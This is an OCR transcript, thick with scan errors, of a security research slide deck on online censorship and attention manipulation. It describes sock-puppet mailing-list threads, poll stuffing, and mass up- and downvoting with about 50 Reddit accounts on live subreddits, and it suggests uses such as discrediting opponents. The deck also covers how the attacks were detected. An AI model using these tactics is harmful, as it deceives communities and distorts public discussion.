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Egypt Cuts Off Most Internet ai 

oj MATT RICHTEL 
Pubtehed: Januaiy 28, 2011 

Autocratic governments often limit phone and Inti 
tense times. But the Internet has never faced an>'t] 
happened in E gypt on Friday, when the governmei 
80 miUion people and a modernizing economy cut 
access to the network and shut down cellphone sei 



BREAKING NEWS: Bank of America reports third-quarter net income of $168 mill 



^ _ Do you know why your app is slo 
We do. 



Libya cuts off Internet service: network 
monitor 



LOS ANGELES , Sat Feb 19, 2011 10:24pm EST 
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RELATED NEWS 



Protesters hold Bahrain 
square 



Libya cuts off Interrwt 
service: network morltor 



(Reuters) - Internet ser\'ice has been cut off in Libya for a second 
consecutive day as protesters step up demonstrations against 
longtime leader Muammar Gaddafi, a U.S. company that 
monitors Internet traffic said on Saturday. 
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^ Q Q j ^ Tunisia plants country-w x 



^ ^ O D www.theregister.co.uk/2011/01/25/tunlsia_facebook_password_slurping/ 
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Tunisia plants country-wide keystroke logger on 
Facebook 



Gmall and Yahoo! too 

By Dan Goodin, 25 Jan 2011 
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RELATED 
STORIES 

Facebook 
security hole 
exposes 
Zuckerberg's 
privates 



Updated Army 
of 'soclalbots' 
steal gigabytes of 
Facebook user 
data 

zuckerberg's 
privates 

Updated Army 
of 'soclalbots' 



Linux and AIX Bare-Metal Recovery Webinar 

Malicious code injected into Tunisian versions of Facebook, Gmail, and Yahoo! stole 
login credentials of users critical of the North African nation's authoritarian 
government, according to security experts and news reports. 

The rogue JavaScript, which was individually customized to steal passwords for each 
site, worked when users tried to login without availing themselves of the secure 
sockets layer protection designed to prevent man-in-the-middle attacks. It was found 
injected into Tunisian versions of Facebook, Gmail, and Yahoo! in late December, 
around the same time that protestors began demanding the ouster of Zine el-Abidine 
Ben Ali. the president who ruled the country from 1987 until his ouster 10 days ago. 



Danny O'Brien, internet advocacy 
coordinator for the Committee to 
injected into Tunisian versions of Facebook, Gmail, and Yahoo! in late December, 
around the same time that protestors began demanding the ouster of Zine el-Abidine 
Ben Ali, the president who ruled the country from 1987 until his ouster 10 days ago. 



MOST READ MOST COMMENTED 

NASTY SSL 3.0 vuln to be revealed soon - 
sources (Update: It's POODLE) 

Kill SSL 3.0 NOW god dammit NOW: HTTPS 
SAVAGED by vicious POODLE 



Son of HudI: Tesco flogs new Atom-powered 
8.3-inch Android tablet 



Russian hackers exploit 'Sandworm' bug to 
spy on NATO, EU PCs* 

Apple's new 'iPad Air 2' sliced open, revealing 
(possible) A8X core 

SPOTLIGHT 




Greedy datagrabs, 
crap security will 
KILL the Internet of 
Thingies 



Kill SSL 3 . , JW 
god dammit NOW: 
HTTPS SAVAGED 
by vicious POODLE 




Greedy datagrabs, 
crap security will 



Kill SSL 3.0 NOW 
god dammit NOW: 



^ ^ [S^ London police use smartp x 
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C D www.homelandsecuritynewswire.com/london-police-use-smaj 

Homeland Security News Wire 
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Law enforcement technology 

London police use smartphones, social 
network to identify rioters 

Published 10 August 2011 Q Share I QI1QE3 

The rioters in London — and now, in other British cities — have 
been usmg Blackberries to outmaneuver the police; 
communicating via BlackBcrry instant-message technology, as 
well as by social networking sites like Faccbook and Twitter, the 
rioters repeatedly signaled fresh target areas to those caught up 
m tlie mayhem; RIM has now agreed to cooperate witli Scotland 
Yard to turn over protestors using the service to coordinate tlieir 
assaults; the police is also releasing CCT\^ images of the rioters to 
a group using face recognition technolog>' to identify and 
condemn rioters; the police is also using Flickr, Tublr, and 
Twitter to spot and identify participants in the riots 

Smartphones, especially 
I'A Blackberries, have been a 
helpful information 
transmission and 
coordination tool for 
anti-government activists 
in a score of Ai^ab 
countries - and they 
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Overt censorship is routed around 




UGC - User Generated Content 
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UGC is a new(ish) paradigm 
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Nothing truly new under the sun 
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rent-a-crowds 
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How will Censorship handle 

UGC? 



th nkst 

app ied research 




"So it's not only certain people have 
a license to speak, now everyone 
has a license to speak. It's a 
question of who gets heard." 



Censorship 
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Censorship 2.0 
This is Profoundly Important 
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Censorship 2.0 



This is Profoundly Important 
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rent-a-crowds 
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sock puppet 



noun 

a false online identity, typically created by a person or group in order 
to promote their own opinions or views: both sides in the debate use sock 
puppets to make it seem as if scores of people are arguing a point 

DERIVATIVES 

sock puppetry noun 



Oxford Dictionary of English 



f we were evil-corp 
(or evil.gov) 



hth'nkst 
app ied research 



what can be done ? 



what will be done ? 



what is being done ? 
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Challenge: 
How to measure efficacy 




mail lists 

online polls 

twitter 

reddit 

news sites 

comment systems 



Why mailing lists? 



"Interesting" people still use it 
Personal curiosity 
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what we wanted to do 
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Assume: 

An email is going to a mail list 
Can we make more people read it ? 
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Assume: 

An email is going to a mail list 

Can we make less people read it ? 
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How do we measure if more 
(or less) people read our mail? 
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Link Clicks 
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How do we write mail content 

wortli clickino on ? 
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Plagiarize, Pilfer, Plunder & Pitch 



but don't be too exciting 
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Control email 

1 . Send email with link 

2. Wait 48 hours 

3. Count clicks 



Experimental email 



1 . Send email with link 




2. Puppets send several 
replies to make a 
longer discussion 
thread 

3. Wait 48 hours 

4. Count clicks 




■ [libcraliontcch] Recent iOS privacy checks Keira Cran 

■ [liberationtechj Recent iOS privacy checks Todd Weiler 

■ lliberationtechl Recent iOS privacy checks duncan at openmailbox.org 

■ riiberationtech] Recent iOS privacy checks Keira Cran 




Control email 




1 . Send email with link 

2. Wait 48 hours 

3. Count clicks 



Experimental email 



1 . Send email with link 

2. Sock puppets send several 
separate emails starting new 
threads 

3. Wait 48 hours 

4. Count clicks 
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• [libciationtechj RIPE NCC Internet-wide measurement project duncan at openmailboxjurg ^^|[|^^^^^^^^H 
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|liberationtcch| Mapp in g out physical surveillance across a city Cody Tarrant 



MM 



31 Seeta Pena Go I ' laran 
liberationtc wul Mapping out physical m.. vciilance across a city Tim Schwartz 

Lucas Gonr 



1 % ^ 



i * L ' i V L 1 ' 1 i L s. 



al sur . ^ i a city Patrick 



^ ■ , , ^. i , y coderman 

liberationtechl Mapping out physical survciiiaace across a lils Blibbet 

V AtW Simon 



1 , . , t 



1 > 1 



, 1 



n 



. 1. ^.alio^u...| Mapp in g out physical sur^Mi..... j across a city Dan O'Huininn 

• IlibcrationtcchI Ntr ^ ii access j ournal tr om I scnix Ryan Bartos 

• fliberationtechi fSfAM:### | FSF email self defence project Greg White 

• [liberationtechl T}(l- Hackin| Team Commercial and are there others? Karen Dunnes 

• fliberationtechi Vifeer features being blocked by the Gambian govt? Mary Bukowski 
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So You 

c Re: So You Like Pain and Vulnera , . ... u.gement? New Article. Pedro Ribeiro (May 13) 

■ Re: So You Like Pain and Vulnerability Management? New Article. Daniel Wood (May 14) 
[CVE-2014-1603J XSS in GetSimple CMS 33.1 Pedro Ribeiro (May 13) 

Codelgniter <= 2.1.4 and Kohana <= 3.2.3, 3.3.2 - Timing Attacks and Object injection Scott /irciszewski (May 13) 
CVE-20 14-2046 - Unauthenticated Credential And Configuration Retrieval In Broadcom Ltd PIPA C211 Portcullis 
Ci r Arbitrary File Read CVE-2014-3225 Dolev Farhi (May 14) 

FD - Multiple stored XSS in FOG imaging deployment system CVE-2014-3111 Dolev Farhi (May 14) 
Paypal Inc Bug Bounty #109 MOS - Bypass & Persistent Vulnerability Vulnerability Lab (May 14) 
einstruction Workspace sudo vulnerability Martin von Gagem (May 14) 

[CVE-2014-37191 ALEPH500 (Integrated librar>' management system) SQL injection shadyMu (May 15) 
AirDroid Lock Screen Bypass Michael Wisniewski (May 15) 

o Re: AirDroid Lock Screen Bypass Keith 1 Myers (May 15) 
CVE-20 14-37 181 ALEPH500 (Integrated library management system) Cross Site Scripting Vulnerability xxx (May 

ttei 

Mac OS X stack_chk_guard not always safe from overwrite rai (May 15) 

jjBijBmminti njiiifj fill (flrn. 

lCVE-20 14-37491 Construtiva CIS Manager CMS POST SQLi Edge (May 16) 
check^dhcp - Nagios Plugins <= 2.0.1 Arbitrary Option File Read Dawid Golunski (May 16) 
UPS Web/SNMP-Manager CS121 authentication bypass, credentials leak, ...jkmac (May 16) 
CA20 1404 13-01: Security Notice for OpenSSL Heartblced Vul: ' Williams, James K(May 16) 
HP Release Control Authenticated Privilege I on and XXH Brandon Perry (May 16) 
Information Exposure via SNMP on ARRIS / Motorola SBCt ^ le Modem Gateway Inokii Security Advisory 
Re: [CVE-2014-37191 ALEPH500 (Integrated librarymanagement system) SQL Injection shadyMu (May 19) 
JavaMail SMTP Header Injection via method setSubject [CSNC-20 14-001] Alexandre Herzog (May 19) 
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COMPANY NEWS SERVICES LABS PUBUCATIONS 



VulDB: Apple Mac OS X up to 13.1.0 Stack Guard stack_chk_guard buffer overflow 



General 

sclpID: 13247 

Affected: Apple Mac OS X up to 13.1.0 
Publi shed: 05/15/2014 (rai) 
Risk: IZZD problematic 

Created: 05/18/2014 
Entry: 74.7% complete 

Summary 



A vulnerability was found in Apple Mac OS X up to 13.1.0. It has been rated as problematic. This issue affects the 
function 8tack_chk_guard of the component Stack Guard. The manipulation with an unknown input leads to a 
buffer overflow vulnerability. Impacted is confidentiality, integrity, and availability. 

The weakness was disclosed 05/15/2014 by ral as Mac OS X stack_chk_guard not always safe from overwrite as 
mailinglist post (Full-Disclosure). The advisory is shared for download at seclists.org . The vendor was not 
Invovled in the public release. The advisory contains: 



P 



AJI credit due to the anon pastebin poster. 



J 



The exploitation is known to be difficult. Attacking locally is a requirement. A single a 
exploitation. Technical details as well as a public exploit are known. 

A public exploit has been developed by ral In ANSI C and been published Immediati 
declared as proof-of-concept. The exploit Is shared for download at maker.fea.st ^. T 
is: 



#lneluda 



extern long stack chk guard ; 




on the internet, no one knows you're a cat. 



Improved Distract Att From X 



combine both approaches 

when a email on X appears, start several distraction 
threads 



attract attention to the distractor threads by lengthen 
the threads with sock puppet mails 



prepare juicy distractor threads ahead of time 



Uses for evil.{corp,gov} 





start distractor threads around emails from opponents 
others you wish not to get as much attention 



• add light discussion to attract attention to your emails 



• discredit opponents by doing a bad sock puppetry 
operation on their behalf 



mail lists 

online polls 

twitter 

reddit 

news sites 

comment systems 



ma sts 


1 


on ne po s 


1 


tw tte r 




redd t 




news s tes 




comment systems 





Why Polls ? 

• Used by a few major news sites 

• Huffington Post, Al Jazeera, etc. 

• Many more random bloggers 

• Even a Golden Globe movie awards poll 

• Readers see the results of polls 
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The World's Most Influential Person Is... 

By TIME Staff Monday. Apr. 27. 2009 
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Read Later 



In a stunning result, the \>dnner of the third annual 
TIME 100 poU and new owner of the title World's 
Most Influential Person is moot. The 2i-year-old 
college student and founder of the online community 
4chan.org, whose real name is Christopher Poole, 
received 16,794,368 votes and an average influence 
rating of 90 (out of a possible 100) to handily beat 
the likes of Barack Obama, Vladimir Putin and 
Oprah Winfrey. To put the magnitude of the upset in 
perspective, it's worth noting that everyone moot 
beat out actually has a job. 
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By Tl ME Staff Monday. Apr. 27. 20( 
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In a stunning result, the winner of tl 
TIME 100 poll and new owner of the 
Most Influential Person is moot. Th( 
college student and founder of the o: 
4chan.0rg, whose real name is Chris 
received 16,794,368 votes and an avj 
rating of 90 (out of a possible 100) ti 
the likes of Barack Obama, Vladimii' 
Oprah Winfrey. To put the magnituc 
perspective, it's worth noting that 
beat out actually has a job. | 
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Surely this is a solved problem 
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HuffPo Readers Poll 



THE HUFFPOST/YOUGOV POLL 



How closely are you following news about the group known as the Islamic State, 
ISIS or ISIL that has been operating in Syria and Iraq? 

■ YbuGov. All Americans ■ nuni-ust Readers 

Very closely SoiMwhat closely 




Not very closely 



Not closely at all 



Subtle Win 



THE HUFFPOST/YOUGOV POLL 

How closely are you following news about the Kfoup known as the Islamic State, 
ISIS or ISIL that has been operating in Syria and Iraq? 



Very closely 



Somewhat closely 



77% 



41% 



Not very closely 



19% 



Not closely at all 
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Landslide Win 



THE HUFFPOST/YOUGOV POLL 
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How closely are you following new s about the group known as the Islamic State, 
ISIS or ISIL that has been operating in Syria and Iraq? 



■ >^exjGov AW Afnertcara 18-^ • HfrffPmt ft aade rs 



Very closety 



Somewhat closely 




41% 



13% 



Not very closely 



Not closely at all 
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these polls have a serious 
credibility problem 
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in 140 seconds.. 



th nkst 

app ied research 



TL;DR 



Gilad Lotan bought followers and did some 
cool analysis of the network graph* 




*httDs://medium.com/i-data/fake-friends-with-real-benefits-eec8c4693bd3i 
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Those communications were: 

• too trivial for movies 

• too voluminous for mail 

• too scandalous for news 

Only feasible w/ decentralization. 

2 11 
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New transactions of many kinds to appear. 
Will there be Bitcoin analogs for the: 

- upvote 
-like 

- tweet 

- blogpost 

- email 

- chat room 
-IM 
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Internet permitted new comm types: trivial, voluminous, scandalous. 
What new txs does Bitcoin permit? 

3 13 
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7 comments share 



Put arms on a bird they said . . . U.imgur.comj 

submitted 4 days ago by ivolunteerastribble 
6 comments share 

X-post from /r/gaming. Hotline Miami badass chick 

arms! (i. imgur.com) 
submitted 3 days ago by Larlockl 
1 comment share 

"I have eyes on the target, over." U.imgur.com; 
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submitted 5 days ago by SomeNorwegianChick 


1 




15 comments share 
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I am the Kingslayer o.imgur.com) 
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163 




submitted 5 days ago by SomeNorwegianChick 




1 




2 comments share 



Ninja Bird umgur.com; 

submitted 6 days ago by TheHappySlothonaut 

4 comments share 

? Bird Arm Billboard. This anyone's work? (imgur.com) 

submitted 7 days ago by JackFlagon 

5 comments share 
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/ Check this very active LIVE feed for the latest on Occupy Central in Hong 
^ Kong. 

^ Greece Is In Full Blown Stock Market Collapse (businessinsider.com) 

1 2156 submitted 4 hours ago by yam 12 

^ 619 comments share 

'Anonymous' Hacker Group Goes After ISIS (anonhq.com) 

2 1550 submitted 3 hours ago by Nedrin 

^ 336 comments share 



♦ Hong Kong Police filnned beating protester (online.wsj.com) 

3 3709 submitted 11 liours ago by L33tmaster 
601 comments share 



4 2382 



Saddam-Era Chemical Weapons Now Under ISIS Control 



(ibtimes.com) 

submitted 8 hours ago by fligs 
1175 comments share 



677 
4^ 



Iconic 2,500 year old Siberian princess 'died from breast cancer', 
reveals MRI scan. Preserved by ice, the 25 year old ancient woman 
covered in tattoos used cannabis to cope with her ravaging illness. 



(siberiantimes.com) 

submitted 2 hours ago by Acantiias 

65 comments share 

♦ theguardian Activists use GPS to track illegal loggers in Brazil's 
^ Amazon rainforest: Hi-tech undercover operation used GPS tracking 
^ on timber trucks for the first time, as well as satellite and aerial 
images to reveal extent of illegal logging in Brazilian Amazon. 

(theguardian.com) 
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Filter Iraq / ISIS 



Filter Ukraine / Russia 



Filter Israel / Palestine 



Filter Ebola 




Filter all dominant topics 
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Score fact 




Reddit post hotness by score and age 




Author: Randy Olson (www.randalolson.com / @randal olson) 



Upvote articles we want to promote 
Downvote articles we want to kill 




So first we needed accounts.. 
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Our accounts seemed broken 

reddits secret sauce 
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But we have > 50 accounts 



What we can do with 50 

accounts? 
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On small subreddits it's easy to 
get a new article on to front page 

by up voting 
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O Follow /r/netsec on Twitter, Facebook, or Google-t- O 



[Featured Postl /r/netsec's Q2 2014 Information Security Hiring Thread 



How to Safely Generate a Random Number (like 6ae51281cde590) u., jppr^ 

26 suomltted 4 minutes ago by Wastol 

^ comment save hide delete ntfw 
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An nvf»n/jpw of how reddit*s new CSS filter works. vc-f.n«is«c) 
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Revocation still doesn't work 



How io belup UarKComet KAI wiln downloao! 



On large subreddits like 
worldnews, 50 isn't enough for 

a full win 
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Upvote articles we want to promote 
Downvote articles we want to kill 




Let's also try down voting.. 
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downvote stuff to knock into moderation queue 

below user/subreddit preference 
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Trickle Downvoting: only down 
vote as many up votes as new 

articles have 
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Up-vote our target 
Trickle down-vote others 
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Mass-DownVotin 



What would happen if we down 
voted all new articles as they 

appeared? 



hth'nkst 
app ied research 



Began with worldnews 



WORLDNEWS 

Tn oa<;torn Ukraine, the mob rules 



all 15 comments 




[f you look at r/worldnews/ new, all posts that mention "russla" In title are massively c 
downvote coun^ 



edit: they now switcned it so it downvotes all submissions.... 



(-J Tyacre 19 pc * ' oiir e 

How the heck is this at 56 downvotes after 4 minutes?! 

permalink sava rtfiort give gold rtply 



Then.. 
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WE'RE UNDER ATTACK, COMRADES! STAY CALM AND DON'T MOVE - WE'RE FIGHTING THIS 
THING WITH EVERYTHING WE'VE GOT! (reddiccom) 



subm'tted 5 months ago bv janre byron dean to /r/clrclebroke2 




reddlt 



qit 



prorr 



I create sets of 
breddits to view 
ether. 

starters, try one 
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This duck sucks. 
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Amazing what mods can do for a 10 year old game (HL2) 



Early Movie Concept Arts 



GOOD BO^ 



chese 

"ip'or-, create a 
jI.i ... yi'..r own: 




rh's vear'c: birthday treasure hunt for my son. 




John Oliver reads an unexpected and hilarious response from POM Wonderful after skewering them on his show 



While I was drinkinq coffee this morning, my dog brought me this. I have no idea where it came from. 



♦ /r/worldnews is currently under a downvote attack - here's what you need to know, and what you can do 

2062 



submitted 4 hours ago by slapchopsuey to /r/worldnews 
794 comments share save hide raport 

researchers nav^nventea a neimec tnat gives numans simuiatec 
object tossed outside the normal human field of view. 



TsTon^nowin^^peSorito avoid] 
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H0t« /r/worldnews is currently under a downvote attack - here's what you need to know, and what you can do 



4^ /r/worldnews is currently under a downvote attack - here's what you need to know, and what you can do 

1576 submitted 13 hours ago by slapchopsuey 

You've probably noticed that the up/down vote numbers have suddenly turned very strange in the past few hours, 
with everything being downvoted below zero. This is because /r/worldnews is under attack. The source of the 
downvoting is currently unknown but we and the admins are investigating and doing our best to find out. 

The purpose of this attack is to disrupt the subreddit. It does this by delivering enough downvotes to render posts 
invisible by reddit's default settings, and to discourage your participating by downvoting everything below zero. 

Here's what you need to know: 

• Dont worry about the downvotes affecting your karma. The unusual votes (in this case, downvotes) will be 
wiped out when the source of the problem is identified. This will probably take a few days. 

• One of the goals of the attack is to render posts invisible by downvoting them below the default threshold 
in users' preferences settings. The way you can neutralize that part of the attack is by changing the 
thershold of invisiblity in your user preferences. Here's how: 1. In the upper right of your screen in the 
area with your username, click preferences. 2. In preferences, go to the "link options" section, and change 

the final line, where it says "don't show me sites with a score of less than " . You can set it to any 

negative number (ex. -100), but even better than filling in a negative number is just leaving the box blank. 
By leaving the box blank you will completely neutralize the attackers' ability to make posts invisible. 

• The "hot" tab will be broken for the duration of the attack, but we recommend browsing by the "new" tab 
(/r/worldnews/new). 

• We also recommend voting; obviously we can't tell you how to vote, but human votes help minimize the 
impact of the attackers, and it only takes a fraction of a second to click the arrows. 

If you like reading and participating in /r/worldnews, following the above tips can help restore most of the 
everyday /r/worldnews experience for you, and with your participating in voting, you can help to weaken and 
expose the attackers, so the admins can solve the problem faster. 

We apologize for the disruption, we appreciate your patience, and we welcome any tips you have for how we can 
Improve the /r/worldnews user experience in this time of difficulty. 



1589 comments saw hlda gtv* gold report 



Much speculation ensued .. 
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For the record, we had nothing to do with /r/technology 



Simultaneously, we ran the 
same thing on netsec... 
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But netsec moderators responded 
with intelligent discussion and 
roped in official reddit admins to 
talk about the problem.. 
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You had a group of about 20 bots that were being used to downvote posts In the subreddit. We rendered the voting from 
those accounts ineffective, but to make it more difficult for the controller of the bots to realize that they've been disabled, 
we still need to make it look like their votes are applying. If we just throw away their votes entirely, the controller's going 
to see that their bots have been blocked, and change up what they're doing immediately. 

that looks like the votes are still applying (even though, as you said, we don't actually rank using it internally). The fake 
score can't be only shown to bot accounts. If the controller opens a submission in an incognito window via TOR or 
something, we'd have no way of linking them back to the bots. So when their 20 downvotes are gone there, they'd know 
what happened. This is /r I'm sure I don't need to elaborate on how many other options there are for separating 

yourself from this sort of thing. I he only feasible option is showing the fake scores to everyone unless we want detection 
to be trivial. 

Being able to hide scores on submissions temporarily like you suggested mignt nelp some, but it really just delays the 
problem, it doesn't solve it. There are also various undesirable side effects from hiding submission scores that don't apply 
as much to comments. Over the years, a number of subreddits have tried experiments with hiding all submission scores 
using CSS like you've done, and they pretty much universally decided that it was a bad idea. Because the "hot" ranking 
involves both score and time, with things dropping in rank based on how old they are, being able to see the scores lets the 
viewer easily get an idea of how popular/significant different submissions are. Without that information available, it 
becomes extremely difficult for someone to look at a subreddit's front page and quickly figure out which submissions were 
the most popular recently. 

I was the one that added the ability for moderators to temporarily hide comment scores, and I've definitely thought about 
extending it to submissions as well. But seeing how poorly all of those experiments that tried to do the same thing with 
ess ended up going has made me hesitant about it. We do already have a very "light" score-hiding for submissions, where 
you can't see the score for the first 2 hours unless you actually visit the comments page. I'm not fully convinced that 
allowing true hiding like we have for comments would be a good thing, and most likely especially not for longer time 
periods since it makes the front page more and more confusing the longer the scores are hidden for. 



This should have been much 

easier to spot 




This should have been much 

easier to spot 



SA-CORE-2014-005 - Drupal core - SQL injection (drufxahocg) 



submitted 12 hours ago by darknessproz 
7 camments share li 
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signup times 

some common email domains 
pattern of names 

ip -ad dresses from l<nown open proxies 
user-agents: lieaders 
low karma interactors 



this post was submitted on 05 May 2014 
0 points (46% like it) 

54 upvOl6S oo Uu^voias 



shoftlink: 



ht t p : / /redd . it / 2 4r h a i 



0 



this post was submitted on 05 May 2014 

337 points (83% upvoted) 
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SA-CORE-2014-005 - Drupal core - SQL injection (drufxahocg) 



submitted 12 hours ago by darknessproz 
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ip-addresses from known open proxies 
user-agents: headers 
low karma interactors 



Growing Personas for Karma 
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Everything i needed to know about managing hackers, i learnt from my DVD collection.. 
Does twitter kill the blogging star ? 

Memory Corruption Attacks. The (almost) complete history.. 

Some Computer Security Prezi's 

Anonymity loves Company 

Tell HN: Toy app thrown together for fun 

Too many InfoSec Conferences? (Infographic Inside) 

Tell HN: Subscription Service that covers InfoSec Happenings.. 

What Anonymous taught us about Cyber War 

Searchable Security Conference Site 

LulzSec will be used to Usher in Regulation (few of us will like) 

Create graphs/nodes/edges in JavaScript (an arborjs tutorial) 

Automated Shoulder Surfing Attacks (Computer Vision meets on screen keyboards) 

BlackHat 2011 (according to Twitter) 

(Simple) Chrome plugin for GPG/P6P in GMail 

Update: (Simple)Chrome plugin to enable GPG in Gmail 

Oracles Mary Ann Davidson lashes out at Security Firm 

Poll: Spotted the Polls/Karma Link? 

Etsy's Office-Hacker Job shows established companies the way.. 



You and Your Research, a modern take 
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Why News Sites? 
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niX.in Pe Bechde! 

Cyclone Hudhud leaves trail of 
devastation; 6 killed in Andhra 
Pradesh, Odisha 

Cyclone Hudhud pounded the coastal 
districts of Andhra Pradesh and Odisha 
with heavy rain and winds of almost 
195 kmph leaving six people dead and 
a trail of devastation with 
Visakhapatnam, where the very severe 
storm made landfall, t3earing the bmnt NDRF 
helplines: 01126107953; 09711077372 

Pakistan targets 15 posts in Jammu, 
seeks UN intervention 

Pakistan heavily shelled 15 border 
outposts and hamlets in Amia sector of 
Jammu and Kashmir earty Sunday 
even as it wrote to UN chief Ban Ki- 
moon blaming India for the escalation 
**■ ~ ' in twrder clashes and sought UN 
intervention on Kashmir. 

Rahul Gandhi to do a BJP, veterans 
will make way for Gen Next 

In wfiat may set off alarm bells for 
many powerful Congress veterans, 
Rahul Gandhi is learnt to be planning 
to introduce some drastic measures, 
including bringing up a new set of 






AN EGG IS LIKE 
MAKING LOVE 



dent miss 



PREP UP FOR DIWALI 



In pics : Hudhud takes India by storm 

Cyclone Hudhud hit India's east coast with 
monstrous ferocity on Sunday, killing at least six 
people and leaving behind a trail of destrucbon 
in Andhra Pradesh and neighbouring Odisha. 
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most viewed 

stories I photos I videos 

:- India hits back v^th vengeance, strikes 37 Pak 
posts, 15 killed 

> Pakistan taught 'befitting lesson', says Modi after 
decline in firing 

> Hudhud intensifies; Odisha, Andhra brace for 
Impact 

:• VIshal Bharadwaj's Haider Isn't just 'cry freedom'. 
It's Gandhian plea for peace 
Kallash Satyarthi's crusade to save childhood 
continues; 60 mn still need him 
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cricket football tennis 

Mohammed Shami a vital cog in MS 
Dhoni'sDlans 



Can we influence this panel? 
Get articles on it or keep articles 

off it? 
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Megachurches: The 
hidden pillar of 
Nigeria's economy 

AFRICA TIM COCKS 

Exactly how much of Nigeria's $510bn GDP 
megachurches make up is difficult to assess, 
since they are, like the oil sector, largely 
opaque entities. 

comments (0) 

+ IB Joshua's church: Built, like others, on 
shifting sands 

+ ANCYL to block TB Joshua from entering SA 

+ Press pause on prophet TB Joshua's power 



LATEST NEWS 




Q Search 



SEARCH 



Obituary: The warmth and laughter of 
Chris van Wyk 
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Most Popular This Week 

MOST COMMENTED 



MOST READ 



Why is Ebola being treated as an 'African 
disease?' 

AFRICA I REUTERS 

The head of the African Development Bank has criticised the 
international response to the Ebola outbreak as too little, too late. 

comments (2) 



Dewani describes meeting Anni in plea 
document 

Lesetja Kganyago named new Reserve Bank 
governor 

Megachurches: The hidden pillar of 
Nigeria's economy 



Union demands Telkom retract 
retrenchment letters to staff 
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since they are, like the oil sector, largely 
opaque entities, 
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* Press pause on prophet TB Joshua's power 
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Why is Ebola being treated as an 'African 

disease?' 

AFRICA; REUTERS 

The head of the African Development Bank has criticised the 
international response to the Ebola outbreak as too little, too late. 

comments (2) 
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Nigeria's economy 

Union demands Telkom retract 
retrenchment letters to staff 
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uma could testify before Nkandia disciplinary 

KlATIONAL SAPA 



he PSA has not ruled out the possibility of President Jacob Zuma 
lelng called to testify during the public works departmental hearings. 



comments (4) 
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No timeline for return of Nigerian church 
lollapse bodies 

MATIONAL SAPA 
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online.wsj.com/home-page 



The U.S. credit-card industry has found its 
sweet spot: a combination of moderate 
economic grovyrth, low interest rates and 
consumers who have struck a balance between 
spending more and paying their bills on 
time. 23 min ago 



••Retailers See Winds Filling 
Holiday Sales 

Ahead of the Tape: The National Retail 
Federation is expecting a 4.1% rise in holiday 
sales overaJL With pump prices near three-year 
lows, more dollars should find their way to the 
malL 



^ Irish Tax Loophole Could Close 

Ireland is expected on Tuesday to unveil 
changes to its tax code that could eventually 
close a well known corporate-tax loophole, the 
Dout>le Irish. 



•"OPEC Members' Rift Deepens 

A rift between OPEC members deepened over 
the weekend, as rival producers in the cartel 
moved in sharply different directions amid 
recently falling oil prices. 

^ Banks Back Crisis Plan 



^U.KL Government Launches Sale of 
Eurostar Stake 



^ Fed's Tarullo Concerned 
About U*S. Productivity 



^ *Gone Girr Leads Box Office Again 

^ Asia Makes a Move in Gold Trading 

^ Hyundai Land Deal: Short on Oversight 




^•luages Step up 
Electioneering 

Out-of-state groups are pouring 
money into judicial elections, 
upsetting genteel traditions 
under which judges in some 
states faced little opposition and avoided the 
ethically tricky process of stumping for votes. 



World > 

In Hong Kong, Both 
Sides Dig In 

Protest leaders and authorities 
dug in over the weekend, as 
Hong Kong's pro-democracy 
demonstration looked to start a 
third week with increasingly pointed rhetoric 
and key roads still blocked. 

" China, U.S. Standoff Deepens Over Protests 
^ Bolivian Leader Poised for Third Term 




^ Silva Endorses Former Rival for 
Brazilian Presidency 



Moscow, Kiev Take Steps to Ease Tensions 
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CDC Confirms 
Texas Health 
Worker Has Ebola 




A Musical Fix for 
American Schools 



Canadian 
Pacific 

Approached CSX 
About Merger 
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OPEC Members' Rift Deepens Amid 
Falling Oil Prices 
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Content engaging our readers now, with 
additional prominence accorded if the 
story is rapidly gaining attention. Our WSJ 
algorithm comprises 30% page views, 
20% Facebook. 20% Twitter, 20% email 
shares and 10% comments. 



Laila Blunt 

@LailaBlunt 
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^ Laila Blunt @LailaBlunt - Jun 26 

Only if for 1628 online.wsj.com/articles/team-... 

4% ••• View summary 
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Only if for 1627 online.wsj.com/articles/gore-... 

4% ♦'^ ••• View summary 
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approval for their capital plans six more months 
to revise their submissions. 

Valeant CEO: Allergan Holders 
Support Vote on Takeover Offer 
Valeant Pharmaceuticals CEO Michael 
Pearson said the company is nearing its goal of 
rounding up enough support from Allergan 
shareholders to secure a vote on its $53 billion 
hostile bid. 8:17 PM 

Hachette Near Deal to Buy 
Perseus Books Group 
Hachette Book Group is near a deal to buy one 
of the biggest irxiependent U.S. publishers, 
Perseus Books Group, beefing up its market 
share even as it is enmeshed In a bitter dispute 
with Amazon com, said people familiar with the 
sKuation. 

^ GoPro Readies a Rare Gadget IPO 

»- Scqnential Brands Ncars Pact for 
Galaxy 

TARP Watchdcig Monitors Credit Suiaae 
Big Investors Missed Stocl( Rally 
^Ex-Im Bank Officials Face Probe 
^ AT&T, DirecTV Tout Deal to Congress 
*- Consumer Confidence at Six- Year High 



Coulsun Guilty, Hroukj* 
Cleared in Tabloid 
Trial 

Two former senior News Corp 
editors nr»et sharply different 
fetes in the tong-running phone- 
hacking case, as the jury cleared Rebekah 
Brooks of all charges but found Andy Coulson 
guilty of illegally intercepting voice-mail 
messages. 

• Prosecutors Havs Uttis to Show 
■ Cameron Issues Apology 

* Ci Graphic: Verdicts in the Trial 

At Least 90 More Kidnapped In Nigeria 
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LeBron James to Opt Out 
of Heat Deal 



Under Ousted CEO, 
Target Lost Its Way 



^ Food Makers' Secret 
Ingredient: Less Salt 
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••The Surprising Findings on 
Two-Year Degrees 



How to Stay Strong as You Age 



Washington Plan to Tax Yoga Leads 
to Political Posturing 
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How Smart Is Your Crock-Pot? 
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Deep Germany Ready |i"««sl 
to Break U.S. Hearts 

For the millions of Americans 

who have gotten swept onto the 

U.S. soccer bandwagon, be 

warned t>efofe this crttical third 

ganoe of the 2014 World Cup — Germany is the 

international soccer version of a bucket of cold 

water. 
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Google Readies TV fw^gel 
Set-Top Box 

Google is to unveil a new 
television set-top tx>x on 
Wednesday as it races 
Amazon.com, Apple and others 
to control digital content mi the home. 

■ Vld«o: Preview of Google I/O Conference 

■ Live Broadcast Via Ooogle Olass 
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n U.S. Set to Export First Oil Since 
^ '70s 



Social Media Fail to Live Up to Early 
Marketing Hype 



^ Google Readies TV Set-Top Box 



5 



The Gluten-Free Craze: Is Tt Healthy? 
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Suidde Attacks and Bombings 
Leave More Than 60 Dead in Iraq 



U.S. » 

Nurse Who Treated 
Ebola Victim in Texas 
Tests Positive for the 
Virus 



Ebola Victim's Family Blames 
Hospital and State 

As U.S. Steps Up Fight, J.FX 
Begins Screening Passengers for 
Ebola 



Politics » 

